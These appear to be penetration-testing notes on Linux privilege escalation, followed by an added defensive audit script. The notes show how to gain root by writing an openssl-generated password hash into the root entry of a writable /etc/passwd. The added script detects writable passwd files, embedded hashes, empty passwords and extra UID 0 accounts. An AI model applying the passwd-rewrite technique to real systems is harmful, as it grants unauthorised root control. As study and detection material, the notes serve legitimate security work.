Background
It's all about gaining root access after you have leveled up your permissions.
Windows and Linux take different approaches.
Linux: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Tools
Linux
Linux privilege checker, by sleventyeleven
- Very useful for finding writable files, checking the kernel version and cron jobs, and looking for things that you can change at your current access level
- https://github.com/sleventyeleven/linuxprivchecker
Change /etc/passwd
> cat /etc/passwd
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
...
> openssl passwd --help
Usage: passwd [options] [passwords]
where options are
-crypt standard Unix password algorithm (default)
-1 MD5-based password algorithm
-apr1 MD5-based password algorithm, Apache variant
-salt string use provided salt
-in file read passwords from file
-stdin read passwords from stdin
-noverify never verify when reading password from terminal
-quiet no warnings
-table format output as table
-reverse switch table columns
> openssl passwd -1
Password:
Verifying - Password:
$1$Ph9TQrSl$IFaPCTz0mDjhuwNtwogiv1
# add the password hash to the root entry or to a sudoer's entry
root:$1$Ph9TQrSl$IFaPCTz0mDjhuwNtwogiv1:0:0:System Administrator:/var/root:/bin/sh
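The edit above only works when /etc/passwd is writable, and it leaves a hash in the second field. The following is an added example, not part of the original notes: a check that flags a writable passwd file, a hash or empty value in the password field, and extra UID 0 accounts. The function name audit_passwd and the finding labels are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit a passwd-format file for signs of the change shown above.
# audit_passwd FILE prints one finding per line and returns 1 if anything was found.
audit_passwd() {
    file=$1
    findings=""
    # Characters 6 and 9 of the ls mode string are the group and other write bits.
    mode=$(ls -ld "$file" 2>/dev/null | cut -c1-10)
    case $mode in
        ?????w????|????????w?) findings="WRITABLE: $file" ;;
    esac
    rows=$(awk -F: '
        # Skip comments and anything that is not a 7-field passwd record.
        /^[ \t]*#/ || NF < 7 { next }
        # Field 2 normally holds "x", "*" or "!". A crypt(3) string ($id$salt$hash)
        # or a 13-character DES hash there means the hash lives in this file.
        $2 ~ /^\$/ || (length($2) == 13 && $2 ~ "^[./0-9A-Za-z]+$") {
            print "HASH_IN_PASSWD: " $1
        }
        # An empty field 2 means the account has no password at all.
        $2 == "" { print "EMPTY_PASSWORD: " $1 }
        # Any account other than root with UID 0 has full root privileges.
        $3 == 0 && $1 != "root" { print "EXTRA_UID0: " $1 }
    ' "$file")
    # Merge both checks and drop empty lines.
    findings=$(printf '%s\n%s' "$findings" "$rows" | sed '/^$/d')
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# Audit the file given as the first argument, or the local /etc/passwd by default.
audit_passwd "${1:-/etc/passwd}" || true
```

Run it from cron or a configuration-management check and alert on any output; a clean file prints nothing.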